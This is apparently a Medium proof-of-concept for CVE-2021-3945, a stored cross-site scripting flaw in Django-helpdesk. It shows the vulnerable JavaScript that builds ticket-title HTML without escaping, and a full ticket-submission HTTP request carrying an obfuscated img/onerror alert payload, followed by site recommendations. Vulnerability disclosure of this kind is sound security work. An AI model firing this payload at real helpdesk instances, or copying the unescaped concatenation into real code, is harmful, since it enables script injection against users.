CVE-2021–3945 Django-helpdesk stored XSS

{data: "ticket",render: function (data, type, row, meta) {if (type === 'display') {data = '<div class="tickettitle"><a href="' + get_url(row) + '" >' + '. ' +row.title + '</a></div>';}return data}}
POST /tickets/submit/ HTTP/1.1
Cookie: csrftoken=5xfltA7UxP3sMJG5OHKCAlHRzR9mrrUbXWfwOrJJl6JhC3OszzsZBcFMEmbCsIeh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------35329910622610784793670383726
Content-Length: 1150
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Content-Disposition: form-data; name="csrfmiddlewaretoken"

Content-Disposition: form-data; name="queue"

Content-Disposition: form-data; name="title"

"><iMg SrC="x" oNeRRor="alert(1);">
Content-Disposition: form-data; name="body"

Content-Disposition: form-data; name="priority"

Content-Disposition: form-data; name="due_date"

Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream

Content-Disposition: form-data; name="submitter_email"




#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

AmazeWoW Interview Experience and Preparation Guidelines

Paula’s Choice cloning (Team: Paula’s Choice)

MongoDB Queue and Processing in Distributed Systems

Tuple vs List: Difference Between List and Tuple in Python

Apple M1, Python, Pandas, and Homebrew

Low Budget, Open Source, Wireless DJ / Dance Instructor Live-stream Video Broadcasting System.

5 Low-Code Influencers To Follow

Conun Development Status Monthly Report :2022.03.22

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

More from Medium

The Tale of a Click leading to RCE

XSS | HTML Injection and File Upload Bypass in HUAWEI Subdomain

A Peculiar Case of XSS and my first bug